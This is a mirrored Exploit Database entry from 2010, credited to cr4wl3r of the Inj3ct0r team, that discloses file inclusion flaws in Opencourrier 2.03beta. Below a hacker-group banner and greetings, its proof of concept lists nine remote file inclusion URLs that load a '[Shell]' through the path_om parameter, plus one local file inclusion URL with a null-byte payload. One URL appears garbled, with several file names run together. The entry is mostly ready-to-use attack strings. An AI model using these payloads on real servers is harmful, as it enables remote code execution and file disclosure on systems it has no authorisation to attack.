Opencourrier 2.03beta – Local File Inclusion / Remote File Inclusion

• Exploit Database
• 69 阅读

• 作者： cr4wl3r
  日期： 2010-04-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12398/

• ===================================================================
  Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability
  ===================================================================
  
  [+] Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability
  
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1######################################1
  0I'm cr4wl3rmember from Inj3ct0r Team1
  1######################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  [+] Discovered By: cr4wl3r
  [+] Download: https://adullact.net/frs/download.php/4708/openmairie_courrier2_2.03beta.zip
  [+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id
  
  [+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
   EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
   SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend
  
  [+] PoC:
  
  [~] RFI:
  http://server/[path]/obj/bible.class.php?path_om=[Shell]
  http://server/[path]/obj/dossier.class.php?pservice.class.phpcategorie.class.php?path_om=[Shell]
  http://server/[path]/obj/collectivite.class.php?path_om=[Shell]
  http://server/[path]/obj/droit.class.php?path_om=[Shell]
  http://server/[path]/obj/tache.class.php?path_om=[Shell]
  http://server/[path]/obj/emetteur.class.php?path_om=[Shell]
  http://server/[path]/obj/utilisateur.class.php?path_om=[Shell]
  http://server/[path]/obj/courrier.recherche.tab.class.php?path_om=[Shell]
  http://server/[path]/obj/profil.class.php?path_om=[Shell]
  
  [~] LFI:
  http://server/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
  
  
  # Inj3ct0r.com [2010-04-26]
  

  Python

  Copy